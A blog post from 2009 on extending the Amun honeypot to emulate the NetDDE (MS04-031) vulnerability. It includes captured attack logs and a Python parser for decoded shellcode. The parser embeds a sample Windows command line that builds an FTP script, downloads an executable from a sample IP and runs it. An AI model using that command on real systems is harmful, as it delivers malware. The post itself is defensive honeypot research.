Virus Blog

09 Jun, 2009

Amun: NetDDE Reloaded

— Posted by zeroq @ 20:54 - 09 Jun, 2009
I am currently working on the CIFS simulation of Amun, so that requests targeting vulnerabilities like NetDDE, LSASS, or MS08-067 can be answered correctly. First results are promising: although the documentation of the protocol is not the best, I managed to simulate a Windows 2000 host for the NetDDE vulnerability (MS04-031) well enough to finally trigger current exploits in the wild. I also had to add a new shellcode decoder detection pattern in order to recognize the shellcode used in the sample exploits available on the internet.

So far I was able to capture two attacks from different hosts against the NetDDE vulnerability:
exploit 137.118.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])

exploit  72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])
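The two log lines above report the download location that Amun recovered from the decoded shellcode in the form `ftp://user:pass@host:port/[files]`. NetDDE-era shellcode of this kind typically drops an FTP command script with `echo` and then runs `ftp -s:` against it. The following added example (written for this post, not code from Amun itself) shows how such a decoded command stage can be turned into that URL form. The command line, the IP address and the file name are constructed sample values, not data from the captures above.

```python
import re

# Constructed sample of the decoded command stage of an FTP-download shellcode.
# Host, port and file name are hypothetical and only serve the example.
SAMPLE_CMD = (
    'cmd /c echo open 137.118.1.2 5056 > o&echo user 1 1 >> o '
    '&echo binary >> o &echo get Cilevb.com >> o &echo quit >> o '
    '&ftp -n -s:o &Cilevb.com&del /q o'
)

# "echo open HOST [PORT]": the FTP server the script connects to.
FTP_OPEN = re.compile(r'echo\s+open\s+(\d{1,3}(?:\.\d{1,3}){3})(?:\s+(\d{1,5}))?')
# "echo user NAME PASS": credentials written into the script (port 21 and
# anonymous are used as fall-backs when the script omits them).
FTP_USER = re.compile(r'echo\s+user\s+([^\s>&]+)\s+([^\s>&]+)')
# "echo get FILE": one line per file to fetch.
FTP_GET = re.compile(r'echo\s+get\s+([^\s>&]+)')
# The script is only interesting if the ftp client is actually invoked with it.
FTP_RUN = re.compile(r'\bftp\s+(?:-\w+\s+)*-s:')


def parse_ftp_script(cmd):
    """Return (host, port, user, password, files) or None if no FTP
    download script is present in the decoded command line."""
    if not FTP_RUN.search(cmd):
        return None
    m_open = FTP_OPEN.search(cmd)
    if not m_open:
        return None
    host = m_open.group(1)
    port = int(m_open.group(2)) if m_open.group(2) else 21
    if not 1 <= port <= 65535:
        return None
    m_user = FTP_USER.search(cmd)
    if m_user:
        user, password = m_user.group(1), m_user.group(2)
    else:
        user, password = 'anonymous', ''
    files = FTP_GET.findall(cmd)
    if not files:
        return None
    return host, port, user, password, files


def extract_download_url(cmd):
    """Format the parsed script the way the post's log lines present it,
    e.g. ftp://1:1@host:port/['file.exe'], or return None."""
    parsed = parse_ftp_script(cmd)
    if parsed is None:
        return None
    host, port, user, password, files = parsed
    return "ftp://%s:%s@%s:%d/%s" % (user, password, host, port, files)


if __name__ == '__main__':
    print(extract_download_url(SAMPLE_CMD))
```

Only the `open`, `user` and `get` lines matter for the download; everything else in the script (`binary`, `quit`, the `del` of the script file) is noise for the purpose of fetching the sample. The `ftp -s:` check keeps the parser from reporting a download for command lines that merely mention an `echo open` without executing it.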


Unfortunately only one of the downloads worked, the second one. The malware has the MD5 hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is a Virut/Rbot variant, which is already well detected by current anti-virus engines.

I have just started to integrate the new CIFS simulation with the MS08-067 vulnerability emulation, but I am not yet finished. I will also update the other vulnerability modules so that they rely on a working simulation rather than on replies made of random bytes with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.

